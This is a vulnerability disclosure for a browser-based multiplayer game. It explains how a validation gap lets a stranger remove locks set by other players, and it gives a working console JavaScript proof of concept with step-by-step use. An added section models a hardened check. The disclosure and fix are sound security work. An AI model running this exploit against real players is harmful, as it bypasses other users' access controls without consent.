Cause:
Failure of validation mechanisms
Where:
https://gitgud.io/BondageProjects/Bondage-College/-/blob/master/BondageClub/Scripts/Validation.js#L369
https://gitgud.io/BondageProjects/Bondage-College/-/blob/master/BondageClub/Scripts/Inventory.js#L1295
https://gitgud.io/BondageProjects/Bondage-College/-/blob/master/BondageClub/Scripts/Validation.js#L792
Effect:
Locks (owner, lover) can be removed by strangers
Why:
InventoryGetLock doesn't check the 'Lock' effect, so if you remove only the effect, newLock will still be true.
So this modification is undetected by ValidationResolveLockModification.
This will ultimately lead to ValidationSanitizeLock being triggered and the lock being removed by the recipient,
since it removes a lock that has no Lock effect.
PoC:
    targetName = prompt("targetMember name", "awaqwq");
    targetMember = Character.find(kamrynn => kamrynn.Name.toLowerCase() == targetName);
    if (targetMember == null) {
        return;
    }
    targetMember.Appearance.forEach(sador => {
        if (sador.Difficulty > 0) {
            if (sador.Property != null) {
                if (sador.Property.Effect != null) {
                    if (sador.Property.Effect.indexOf("Lock") >= 0) {
                        for (var erene = 0; erene < sador.Property.Effect.length; erene++) {
                            sador.Property.Effect[erene] == "Lock" && (sador.Property.Effect.splice(erene, 1), erene--);
                        }
                    }
                }
            }
        }
    });
    targetMember.ArousalSettings.Progress = 0;
    ChatRoomCharacterUpdate(targetMember);
How to:
Alice is the owner of Bob, while Oscar has no relationship with Alice or Bob at all.
Now suppose Bob has some toys locked by an owner's padlock of Alice.
Oscar enters the room, presses F12, enters the PoC mentioned above, and types 'bob' in the prompt.
Those toys will be unlocked immediately.
Known affected version:
EVERY VERSION
Who am I:
A community cybersecurity consultant from CN
I'd like to be referred to as:
awaqwq(huzpsb)
DO NOT DISCLOSE THIS IN GAME, AT LEAST NOT BEFORE THIS PATCH IS MERGED.
COMMENT HERE INSTEAD OF THE GITGUD IF YOU WANT TO DRAW MY QUICK ATTENTION.
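
The validation gap described under "Why", as a simplified model with the weak comparison beside a hardened one. This is an added example, not code from the report or from the game: every function name, the `LockedBy` field and the sample items are assumptions made for illustration.

```javascript
// Simplified model of the flaw in this report. Names and data shapes are
// assumptions for illustration, not the game's real functions.
const clone = (o) => JSON.parse(JSON.stringify(o));

// Lock lookup as the report describes it: reads the lock name only and never
// looks at the "Lock" effect.
const getLock = (item) => (item.Property && item.Property.LockedBy) || null;
const hasLockEffect = (item) =>
  Boolean(item.Property && (item.Property.Effect || []).includes("Lock"));

// Sanitizer as described: a lock that lacks the "Lock" effect is stripped.
function sanitizeLock(item) {
  if (getLock(item) && !hasLockEffect(item)) delete item.Property.LockedBy;
  return item;
}

// Weak comparison: lock names only, so an effect-only edit reads as "no change".
const lockChangedWeak = (prev, next) => getLock(prev) !== getLock(next);

// Hardened comparison: the effect is part of the lock state.
const lockChangedStrict = (prev, next) =>
  getLock(prev) !== getLock(next) || hasLockEffect(prev) !== hasLockEffect(next);

// Receiver-side validation of an incoming item update. An unauthorized lock
// change is rolled back to the previous item; anything else is sanitized.
function validateUpdate(prev, next, senderMayUnlock, lockChanged) {
  if (lockChanged(prev, next) && !senderMayUnlock) return clone(prev);
  return sanitizeLock(clone(next));
}

// Constructed sample items (values are illustrative).
const locked = { Name: "Cuffs", Property: { LockedBy: "OwnerPadlock", Effect: ["Lock"] } };
const tampered = { Name: "Cuffs", Property: { LockedBy: "OwnerPadlock", Effect: [] } };

// Update from a sender with no permission on the lock.
const weakResult = validateUpdate(locked, tampered, false, lockChangedWeak);
const strictResult = validateUpdate(locked, tampered, false, lockChangedStrict);
console.log("weak check keeps lock:", getLock(weakResult) !== null);
console.log("strict check keeps lock:", getLock(strictResult) !== null);
```

With the weak comparison the sanitizer strips the lock on the receiving side; with the strict comparison the effect-only edit is classified as a lock change and rolled back before sanitizing runs.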